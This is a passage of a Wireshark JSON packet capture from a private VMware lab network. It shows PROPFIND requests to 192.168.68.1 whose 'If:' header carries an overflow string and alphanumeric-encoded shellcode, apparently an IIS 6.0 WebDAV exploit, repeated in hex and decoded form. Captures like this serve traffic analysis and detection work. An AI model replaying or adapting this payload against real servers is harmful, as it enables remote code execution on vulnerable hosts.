82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/ebReJLWXFHJjDQuVWCfjSoAjSYSpVgrdyueFOUbxowwhOihCjbaAQxMjziPTm<54><6D><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/FRniFknybEzTngGaScDqCfmGETjiTpDhYSaNBqEiyLEOJmNkOeWCpioZxeTjK<6A><4B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "629"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.926662000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.926662000",
|
||
"frame.time_delta": "0.000053000",
|
||
"frame.time_delta_displayed": "0.005204000",
|
||
"frame.time_relative": "17.177602000",
|
||
"frame.number": "638",
|
||
"frame.len": "249",
|
||
"frame.cap_len": "249",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "235",
|
||
"ip.id": "0x00008aba",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000a5eb",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "34609",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "34609",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "86",
|
||
"tcp.len": "183",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1335709344",
|
||
"tcp.nxtseq": "1632",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3438000890",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x000003b8",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:be:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:be:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868734",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000362000",
|
||
"tcp.analysis.bytes_in_flight": "1631",
|
||
"tcp.analysis.push_bytes_sent": "1631"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000952000",
|
||
"tcp.time_delta": "0.000053000"
|
||
},
|
||
"tcp.payload": "79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "637",
|
||
"tcp.segment": "638",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1631",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:48:57:69:4f:51:48:70:75:66:64:46:66:69:51:68:43:52:4a:64:75:61:69:78:4e:42:78:55:4f:6b:43:44:52:6e:53:58:74:78:71:69:4f:76:74:77:73:63:47:44:69:6c:57:6c:55:6b:50:50:4e:56:68:48:65:e7:85:b5:e7:99:90:e6:a5:8f:e7:a1:93:e7:81:a2:e7:a9:92:e6:a1:b5:e6:85:b7:e7:a5:b8:e4:85:9a:e7:85:8f:e6:b9:b4:e6:a1:a1:e7:95:af:e4:b5:87:e6:99:95:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:89:b7:e7:9d:a3:e4:ad:b3:e4:a1:83:e5:89:a7:e4:85:98:e4:85:b5:e4:a9:b2:e5:9d:8d:e4:85:b1:e4:9d:8e:e7:81:87:e5:a9:a9:e7:a9:98:e7:91:a3:e5:89:95:e5:99:b8:e7:81:91:e7:91:b0:e4:b9:86:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6d:4b:74:6c:74:4a:52:5a:78:4d:43:73:4a:61:58:46:52:55:48:4b:6c:45:65:50:62:54:61:59:6f:53:77:73:51:52:65:74:65:50:52:49:7a:57:64:53:75:77:52:42:5a:4b:53:6e:56:4d:73:51:64:51:6b:42:e6:a9:ae:e5:a5:a6:e5:85:91:e6:ad:ad:e7:a1:90:e7:a5:98:e6:b9:84:e4:91:a8:e7:99:aa:e7:85:89:e6:b1:aa:e7:85:b5:e4:91:93:e5:a9:85:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:99:93:e6:85:a2:e6:b1:b1:e6:95:91:e1:8f:80:e6:a0:83:e5:89:8d:e6:b5:a4:e5:89:aa:e6:bd:a8:e5:89:8b:e4:a1:a9:e5:a5:b0:e5:a1:86:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
